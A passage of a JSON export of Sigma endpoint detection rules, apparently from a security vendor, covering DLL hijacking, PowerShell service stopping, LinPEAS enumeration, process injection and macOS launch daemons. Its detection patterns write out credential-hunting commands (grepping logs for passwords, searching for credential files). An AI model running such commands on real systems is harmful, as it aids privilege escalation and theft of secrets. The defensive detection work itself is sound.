filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5fa685c8-ce30-4b62-b050-279c87efed32",
"rule_name": "DLL Hijacking via ALG.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ALG.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5fadcdde-a704-464c-8db6-76650b015644",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295563Z",
"creation_date": "2026-03-23T11:45:35.295566Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295573Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_powershell_stop_service.yml",
"content": "title: Service Stopped via PowerShell\nid: 5fadcdde-a704-464c-8db6-76650b015644\ndescription: |\n Detects the Stop-Service PowerShell cmdlet being used to stop a specific service.\n Attackers can use this command to stop security services to evade detection.\n It is recommended to check the for other suspicious activities by the process launching the PowerShell command.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/10/15\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1489\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ServiceStop\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Stop-Service'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n exclusion_programfiles:\n - ProcessParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - ProcessGrandparentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_citrix:\n ProcessImage: '?:\\Program Files\\Citrix\\ConfigSync\\ConfigSyncRun.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Citrix Systems, Inc.'\n # PowershellCommand|contains: 'Stop-Service -Name $serviceName'\n\n exclusion_powershell_management:\n PowershellCommand|contains|all:\n - 'GUID=\"EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D\"'\n - 'Author=\"Microsoft Corporation\"'\n - 'NestedModules=\"Microsoft.PowerShell.Commands.Management.dll\"'\n - 'CmdletsToExport=@(\"Add-Content\",'\n\n exclusion_ansible:\n ProcessCommandLine:\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA=='\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA=='\n ProcessParentCommandLine|startswith:\n - 'PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdA'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQ'\n\n exclusion_sdiagnhost:\n ProcessImage: '?:\\Windows\\System32\\sdiagnhost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentCommandLine|contains|all:\n - 'w32tm.exe /query /source'\n - 'Check-TimeAccurateness $timeServer'\n - 'Stop-Service \"w32time\"'\n\n exclusion_exchange_ui:\n ProcessInternalName: 'ExSetupUI.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_npcap:\n PowershellCommand|contains: 'Microsoft.PowerShell.Management\\Start-Service -Name npcap -PassThru | Microsoft.PowerShell.Management\\Stop-Service -PassThru | Microsoft.PowerShell.Management\\Start-Service'\n\n exclusion_choco:\n ProcessImage:\n - '?:\\program files\\chocolatey gui\\chocolateygui.exe'\n - '?:\\program files (x86)\\chocolatey gui\\chocolateygui.exe'\n\n exclusion_monitoring_agent:\n # C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Monitoring Host Temporary Files 18220\\27811\\\n PowershellCommand|contains|all:\n - 'schtasks /create /tn DPMDiscoveryHelper /tr ?net start healthservice? /st $timeStr /rl highest /sc once /ru system /rp /f'\n - 'Stop-Service healthservice'\n\n exclusion_windowsadmincenter:\n # C:\\Packages\\Plugins\\Microsoft.AdminCenter.AdminCenter\\0.0.0.316\\Sme.VmExtension\\Sme.VmExtension.WindowsAdminCenter\\Sme.VmExtension.WindowsAdminCenter.psm1\n PowershellCommand|contains|all:\n - 'function Stop-WACService {'\n - ' Stop-Service (Get-WacServiceName)'\n - '-ExitCode WACServiceCannotBeStopped'\n\n exclusion_connectcare:\n ProcessImage|endswith: '\\brainlab\\appls\\connectedcare_*\\gateway\\propertiesupdate.exe'\n\n exclusion_fsecure:\n ProcessImage: '?:\\program files (x86)\\f-secure\\psb\\wa_3rd_party_host_32.exe'\n\n exclusion_rudder:\n ProcessCommandLine: 'powershell.exe -noninteractive -nologo -windowstyle hidden -file ?:\\program files\\rudder\\bin\\rudder.ps1 agent run'\n\n exclusion_centrastage:\n ProcessParentImage: '?:\\program files (x86)\\centrastage\\cagservice.exe'\n\n exclusion_fogpatcher:\n ProcessCommandLine: 'powershell.exe -executionpolicy bypass -file ?:\\program files (x86)\\fog\\fogpatcher.ps1'\n\n #exclusion_serviceportalagent:\n # PowershellCommand|contains:\n # - 'Stop-Service -Name $Service -Force'\n # - 'Where-Object { $_.Status -eq \"Running\" } | Stop-Service -Force'\n # - '# net stop does a more efficent job of shutting down the dependent services than Stop-Service'\n # - '$Status | Stop-Service -Force -PassThru | Set-Service -StartupType Disabled | Out-Null'\n # PowershellScriptPath:\n # - '?:\\Program Files\\WindowsPowerShell\\Modules\\MTRP.Powershell.Utils\\\\*\\Public\\\\*.ps1'\n # - '?:\\Program Files\\WindowsPowerShell\\Modules\\MTRP.oPowershell.ExtendedProperties\\\\*\\Public\\\\*.ps1'\n\n exclusion_icinga:\n PowershellCommand|contains|all:\n - 'Test-IcingaForWindowsManagementConsoleExit()'\n - \"Stop-Service'.ToLower()\"\n - '$global:Icinga.InstallWizard.HeaderSelection = $Selection;'\n - 'Read-IcingaPowerShellModuleFile -FileContent $ModuleContent;'\n - 'Deny-IcingaJEACommand -Command $Command -FileComment $DeserializedFile.Comment'\n\n exclusion_serviceportalagent:\n ProcessOriginalFileName: 'MmrAgent.NetFxEmulator.exe'\n ProcessSigned: 'true'\n ProcessSignature: \"Microsoft Corporation\"\n\n exclusion_azure:\n ProcessImage: '?:\\Program Files\\AzureConnectedMachineAgent\\GCArcService2\\GC\\gc_worker.exe'\n\n # C:\\Packages\\Plugins\\Microsoft.AdminCenter.AdminCenter\\0.42.0.0\\wacrun.exe\n exclusion_admincenter:\n ProcessOriginalFileName: 'wacrun.exe'\n ProcessSigned: 'true'\n ProcessSignature: \"Microsoft Corporation\"\n\n exclusion_dynatrace:\n ProcessAncestors|contains:\n - '?:\\Program Files\\dynatrace\\oneagent\\agent\\pcap\\dynatrace_onepcap.exe'\n - '?:\\Program Files (x86)\\dynatrace\\oneagent\\agent\\pcap\\dynatrace_onepcap.exe'\n PowershellCommand|contains: '-Name npcap'\n\n exclusion_action1:\n - ProcessAncestors|contains: '?:\\Windows\\Action1\\action1_agent.exe'\n - PowershellCommand|contains: '# NOT CURRENTLY USED: # NEVER change this: must be in sync with the agent code'\n\n exclusion_nsclient_plusplus:\n ProcessAncestors|contains: '?:\\NSClient++\\NSClient++.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5fadcdde-a704-464c-8db6-76650b015644",
"rule_name": "Service Stopped via PowerShell",
"rule_description": "Detects the Stop-Service PowerShell cmdlet being used to stop a specific service.\nAttackers can use this command to stop security services to evade detection.\nIt is recommended to check the for other suspicious activities by the process launching the PowerShell command.\n",
"rule_creation_date": "2021-10-15",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1489",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5fb64523-1865-4c78-bf2f-2e444dfd0947",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095271Z",
"creation_date": "2026-03-23T11:45:34.095273Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095277Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS",
"https://attack.mitre.org/techniques/T1082/",
"https://attack.mitre.org/techniques/T1592/001/",
"https://attack.mitre.org/techniques/T1592/002/",
"https://attack.mitre.org/techniques/T1592/004/",
"https://attack.mitre.org/tactics/TA0004/"
],
"name": "t1082_linpeas.yml",
"content": "title: LinPEAS Hacktool Enumeration Command Executed\nid: 5fb64523-1865-4c78-bf2f-2e444dfd0947\ndescription: |\n Detects specific enumeration commands from the linPEAS shell script, a popular Open Source enumeration script for privilege escalation.\n Attackers may try to search for secrets or vulnerabilities present on an infected system to try and elevate their privileges locally or for lateral movement.\n It is recommended to analyze the context behind the execution of the linPEAS tool as well as to look for malicious actions by the same user around this alert.\nreferences:\n - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS\n - https://attack.mitre.org/techniques/T1082/\n - https://attack.mitre.org/techniques/T1592/001/\n - https://attack.mitre.org/techniques/T1592/002/\n - https://attack.mitre.org/techniques/T1592/004/\n - https://attack.mitre.org/tactics/TA0004/\ndate: 2022/10/18\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - attack.reconnaissance\n - attack.t1592.001\n - attack.t1592.002\n - attack.t1592.004\n - attack.privilege_escalation\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.LinPEAS\n - classification.Linux.Behavior.Exploitation\n - classification.Linux.Behavior.SensitiveInformation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_systemd:\n Image|endswith: '/find'\n CommandLine|contains: '/systemd -name *.service -o -name *.timer -o -name rocketchat.service -o -name *.socket'\n\n selection_sqlite3:\n Image|endswith: '/sqlite3'\n CommandLine|contains:\n - '/home/*/.cache/tracker/meta.db .schema nie:InformationElement_nie:copyright'\n - '/var/lib/postgresql/.cache/tracker/meta.db .schema maemo:PostalAddress'\n\n selection_psql:\n Image|endswith: '/timeout'\n CommandLine|contains: '1 psql -U pgsql -d template0 -c select version()'\n\n selection_bashrc:\n Image|endswith: '/grep'\n CommandLine|contains: '-Ei enable_autologin|7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|root|snyk|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|xfreerdp'\n\n selection_dpkg_log:\n Image|endswith: '/grep'\n CommandLine|contains: '-R -i pwd\\|passw /var/log/dpkg.log'\n\n selection_connnected_services:\n Image|endswith: '/grep'\n CommandLine|contains: '-Ev .bashrc|.bluemix|.cer|.cloudflared|.crt|.csr|.db|.der|.env|.erlang.cookie|.ftpconfig|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd'\n\n selection_nginx:\n Image|endswith: '/sed'\n CommandLine|contains: '-E s,ngx_http_geoip_module.so|ngx_http_xslt_filter_module.so|ngx_stream_geoip_module.so|ngx_http_image_filter_module.so|ngx_mail_module.so|ngx_stream_module.so'\n\n selection_cron:\n Image|endswith: '/cat'\n CommandLine|contains: '/etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly /etc/crontab /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/*'\n\n selection_passwds:\n Image|endswith: '/find'\n CommandLine|contains: '/var/log/ /private/var/log -type f -exec grep -R -i pwd\\|passw {} ;'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5fb64523-1865-4c78-bf2f-2e444dfd0947",
"rule_name": "LinPEAS Hacktool Enumeration Command Executed",
"rule_description": "Detects specific enumeration commands from the linPEAS shell script, a popular Open Source enumeration script for privilege escalation.\nAttackers may try to search for secrets or vulnerabilities present on an infected system to try and elevate their privileges locally or for lateral movement.\nIt is recommended to analyze the context behind the execution of the linPEAS tool as well as to look for malicious actions by the same user around this alert.\n",
"rule_creation_date": "2022-10-18",
"rule_modified_date": "2025-01-09",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1082",
"attack.t1592.001",
"attack.t1592.002",
"attack.t1592.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5fddb898-f5d5-4dd5-b0b5-7385e614194e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079185Z",
"creation_date": "2026-03-23T11:45:34.079187Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079191Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_possible_sacrifical_process.yml",
"content": "title: Possible Sacrificial Process Spawned\nid: 5fddb898-f5d5-4dd5-b0b5-7385e614194e\ndescription: |\n This rule detects suspicious parent/child process relationships that may indicate sacrifical processes or process injection.\n Malware such as Rhadhamanthys Stealer or Cobalt Strike can inject its core component into a sacrificial process in order to evade defenses.\n It is recommended to analyze the execution context and the IP address contacted by this process, if there is any.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/27\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - attack.discovery\n - attack.t1082\n - attack.credential_access\n - attack.t1539\n - attack.t1555\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine:\n - '?:\\Windows\\system32\\credwiz.exe'\n - '?:\\Windows\\system32\\OOBE-Maintenance.exe'\n - '?:\\Windows\\system32\\openwith.exe'\n - '?:\\Windows\\system32\\dllhost.exe'\n - '?:\\Windows\\system32\\rundll32.exe'\n ParentCommandLine:\n - '?:\\Windows\\system32\\dialer.exe'\n - '?:\\Windows\\system32\\openwith.exe'\n - '?:\\Windows\\system32\\dllhost.exe'\n - '?:\\Windows\\system32\\rundll32.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5fddb898-f5d5-4dd5-b0b5-7385e614194e",
"rule_name": "Possible Sacrificial Process Spawned",
"rule_description": "This rule detects suspicious parent/child process relationships that may indicate sacrifical processes or process injection.\nMalware such as Rhadhamanthys Stealer or Cobalt Strike can inject its core component into a sacrificial process in order to evade defenses.\nIt is recommended to analyze the execution context and the IP address contacted by this process, if there is any.\n",
"rule_creation_date": "2024-03-27",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion",
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1082",
"attack.t1539",
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ff36646-f412-456e-a97f-42ac3798d2c3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296149Z",
"creation_date": "2026-03-23T11:45:35.296153Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296160Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md",
"https://attack.mitre.org/techniques/T1543/001/",
"https://attack.mitre.org/techniques/T1543/004/",
"https://attack.mitre.org/techniques/T1569/001/"
],
"name": "t1543_004_launchctl_new_daemon.yml",
"content": "title: New Launch Daemon Added via Command-line\nid: 5ff36646-f412-456e-a97f-42ac3798d2c3\ndescription: |\n Detects a new Launch Daemon being added via command line (launchctl).\n Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS.\n Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction.\n An attacker may create or modify Launch Daemons to execute malicious payloads as a way to establish persistent access.\n It is recommended to check the content of the newly created plist file for malicious content.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1543/004/\n - https://attack.mitre.org/techniques/T1569/001/\ndate: 2024/06/26\nmodified: 2026/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.001\n - attack.t1543.004\n - attack.t1569.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/bin/launchctl'\n CommandLine|contains:\n - ' bootstrap'\n # Legacy way\n - ' load'\n Ancestors|contains:\n # folder\n - '/Volumes/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/Users/'\n - '/private/var/root'\n - '/usr/local/bin/'\n # binary\n - 'osascript'\n\n exclusion_sandbox:\n - Image|startswith: '/private/tmp/PKInstallSandbox'\n - ProcessParentImage|startswith: '/private/tmp/PKInstallSandbox'\n - ProcessAncestors|contains: '|/private/tmp/PKInstallSandbox.'\n\n exclusion_install:\n Ancestors|contains:\n - '/private/tmp/KSInstallAction'\n - '/usr/sbin/installer'\n\n exclusion_users_application:\n Ancestors|contains:\n - '/Users/*/Library/Application Support/'\n - '/Users/*/Applications/'\n\n exclusion_logioptions:\n - Image: '/Users/Shared/LogiOptionsPlus/depots/*/logioptionsplus/logioptionsplus_agent.app/Contents/Frameworks/logioptionsplus_updater.app/Contents/MacOS/logioptionsplus_updater'\n - ParentImage: '/Users/Shared/LogiOptionsPlus/depots/*/logioptionsplus/logioptionsplus_agent.app/Contents/Frameworks/logioptionsplus_updater.app/Contents/MacOS/logioptionsplus_updater'\n CommandLine:\n - '/bin/launchctl bootstrap gui/* /Library/LaunchAgents/com.logi.optionsplus.plist'\n - '/bin/launchctl load /Library/LaunchDaemons/com.logi.optionsplus.updater.plist'\n\n exclusion_grammarly:\n Ancestors|contains: '/Users/*/Applications/Grammarly Desktop.app/Contents/MacOS/Grammarly Desktop'\n\n exclusion_homebrew:\n Image|startswith: '/Users/*/homebrew/Library/Homebrew/'\n\n exclusion_lghub:\n ParentImage: '/Users/Shared/LGHUB/depots/*/core/lghub.app/Contents/MacOS/lghub_updater.app/Contents/MacOS/lghub_updater'\n CommandLine: '/bin/launchctl load /Library/LaunchDaemons/com.logi.ghub.updater.plist'\n\n exclusion_java_updater:\n ParentImage: '/Users/*/Library/Caches/com.oracle.java.JavaAppletPlugin/org.sparkle-project.Sparkle/*/Contents/MacOS/MacJREInstaller'\n CommandLine: 'launchctl load /Library/LaunchAgents/com.oracle.java.Java-Updater.plist'\n\n exclusion_bomgar:\n - Image: '/Users/*/.com.bomgar.scc.*/sdcust.cache/pin-launch/Open To Start Support Session.app/Contents/MacOS/bomgar-scc'\n - ParentImage: '/Users/*/.com.bomgar.scc.*/sdcust.cache/pin-launch/Open To Start Support Session.app/Contents/MacOS/sra-scc'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/PKInstallSandbox.??????/'\n\n exclusion_manageengine:\n CommandLine: '/bin/launchctl load -wf /library/launchdaemons/com.manageengine.desktopcentral.dcagentupgrader.plist'\n\n exclusion_google:\n CommandLine:\n - '/bin/launchctl bootstrap system /library/launchdaemons/com.google.googleupdater.wake.system.plist'\n - '/bin/launchctl bootstrap gui/503 